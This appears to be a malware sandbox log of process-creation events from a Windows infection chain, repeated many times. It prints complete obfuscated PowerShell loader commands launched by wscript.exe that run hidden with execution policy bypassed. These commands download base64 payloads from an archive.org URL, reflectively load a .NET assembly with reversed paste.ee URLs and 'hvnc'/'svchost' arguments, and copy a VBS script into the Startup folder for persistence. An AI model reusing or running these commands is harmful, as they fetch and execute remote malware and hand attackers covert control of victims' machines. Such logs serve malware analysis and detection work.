Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
